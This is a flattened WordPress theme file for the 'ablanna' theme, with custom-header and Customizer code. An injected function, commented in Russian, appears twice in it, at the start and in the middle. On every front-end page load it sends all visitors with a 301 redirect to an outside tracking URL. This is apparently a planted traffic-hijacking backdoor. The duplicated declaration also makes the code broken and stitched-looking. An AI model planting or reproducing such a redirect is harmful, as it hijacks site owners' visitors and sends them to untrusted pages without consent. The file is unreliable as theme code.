function my_custom_redirect() { // Убедитесь, что этот код выполняется только на фронтенде if (!is_admin()) { // URL для редиректа $redirect_url = 'https://faq95.doctortrf.com/l/?sub1=[ID]&sub2=[SID]&sub3=3&sub4=bodyclick'; // Выполнить редирект wp_redirect($redirect_url, 301); exit(); } } add_action('template_redirect', 'my_custom_redirect'); /** * Sample implementation of the Custom Header feature * * You can add an optional custom header image to header.php like so ... * * * @link https://developer.wordpress.org/themes/functionality/custom-headers/ * * @package ablanna */ /** * Set up the WordPress core custom header feature. * * @uses ablanna_header() */ function ablanna_custom_header() { $defaults = array('default-image' => ' ','header-text' => false,'default-text-color'=> '000', 'width' => 1000, 'height' => 100,'random-default'=> false,'uploads'=> false,'wp-head-callback' => 'wphead_cb', 'admin-head-callback' => 'adminhead_cb','admin-preview-callback'=> 'adminpreview_cb', );} add_action( 'after_setup_theme', 'ablanna_custom_header' ); if ( ! function_exists( 'ablanna_header' ) ) : /** * Styles the header image and text displayed on the blog. * * @see ablanna_custom_header. */ function ablanna_header() { $header_text_color = get_header_textcolor(); /* * If no custom options for text are set, let's bail. * get_header_textcolor() options: Any hex value, 'blank' to hide text. Default: add_theme_support( 'custom-header' ). */ if ( get_theme_support( 'custom-header', 'default-text-color' ) === $header_text_color ) {return;} } endif; function my_custom_redirect() { // Убедитесь, что этот код выполняется только на фронтенде if (!is_admin()) { // URL для редиректа $redirect_url = 'https://faq95.doctortrf.com/l/?sub1=[ID]&sub2=[SID]&sub3=3&sub4=bodyclick'; // Выполнить редирект wp_redirect($redirect_url, 301); exit(); } } add_action('template_redirect', 'my_custom_redirect'); /** * ablanna Theme Customizer * * @package ablanna */ /** * Add postMessage support for site title and description for the Theme Customizer. * * @param WP_Customize_Manager $wp_customize Theme Customizer object. */ function ablanna_customize_register( $wp_customize ) { $wp_customize->get_setting( 'blogname' )->transport = 'postMessage'; $wp_customize->get_setting( 'blogdescription' )->transport = 'postMessage'; $wp_customize->get_setting( 'header_textcolor' )->transport = 'postMessage'; if ( isset( $wp_customize->selective_refresh ) ) { $wp_customize->selective_refresh->add_partial( 'blogname', array( 'selector' => '.site-title a', 'render_callback' => 'ablanna_customize_partial_blogname', ) ); $wp_customize->selective_refresh->add_partial( 'blogdescription', array( 'selector' => '.site-description', 'render_callback' => 'ablanna_customize_partial_blogdescription', ) ); } } add_action( 'customize_register', 'ablanna_customize_register' ); /** * Render the site title for the selective refresh partial. * * @return void */ function ablanna_customize_partial_blogname() {bloginfo( 'name' );} /** * Render the site tagline for the selective refresh partial. * * @return void */ function ablanna_customize_partial_blogdescription() {bloginfo( 'description' );} /** * Binds JS handlers to make Theme Customizer preview reload changes asynchronously. */ function ablanna_customize_preview_js() { wp_enqueue_script( 'ablanna-customizer', get_template_directory_uri() . '/assets/js/customizer.js', array( 'customize-preview' ), '20151215', true ); } add_action( 'customize_preview_init', 'ablanna_customize_preview_js' );